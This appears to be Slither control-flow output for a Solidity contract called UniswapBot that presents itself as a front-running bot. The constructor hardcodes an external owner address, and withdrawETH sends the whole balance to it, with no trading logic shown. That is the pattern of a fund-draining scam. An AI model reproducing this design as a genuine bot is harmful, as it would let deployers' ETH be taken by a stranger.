Contract: IUniswapV2Migrator
==================================================


Contract: IUniswapV1Exchange
==================================================


Contract: IUniswapV1Factory
==================================================


Contract: UniswapBot
==================================================

Function: constructor
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: owner = 0x11393B88888DD532F26205D355d9E0CaC2C399eE

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: frontRunningBot = 0x0000000000000000000000000000000000000000

Edges:
  0 -> 1
  1 -> 2

Function: startBot
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(! isRunning,Bot is already running)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: isRunning = true

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: BotStarted()

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: onlyOwnerOrBot()

Edges:
  0 -> 4
  1 -> 2
  2 -> 3
  4 -> 1

Function: pauseBot
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(isRunning,Bot is already paused)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: isRunning = false

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: BotPaused()

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: onlyOwnerOrBot()

Edges:
  0 -> 4
  1 -> 2
  2 -> 3
  4 -> 1

Function: compoundProfits
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: pool += profit

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: ProfitCompounded(pool)

Edges:
  0 -> 1
  1 -> 2

Function: withdrawETH
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: balance = address(this).balance

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(balance > 0,No ETH balance to withdraw)

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: address(owner).transfer(balance)

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: Withdrawn(owner,balance)

  ID: 5
  Type: NodeType.EXPRESSION
  Expression: onlyOwnerOrBot()

Edges:
  0 -> 5
  1 -> 2
  2 -> 3
  3 -> 4
  5 -> 1

Function: getBalance
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.RETURN
  Expression: address(this).balance

Edges:
  0 -> 1

Function: receive
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.IF
  Expression: isRunning

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: compoundProfits(msg.value)

  ID: 3
  Type: NodeType.ENDIF
  Expression: 

Edges:
  0 -> 1
  1 -> 2
  1 -> 3
  2 -> 3

Function: slitherConstructorVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: isRunning = false

Edges:


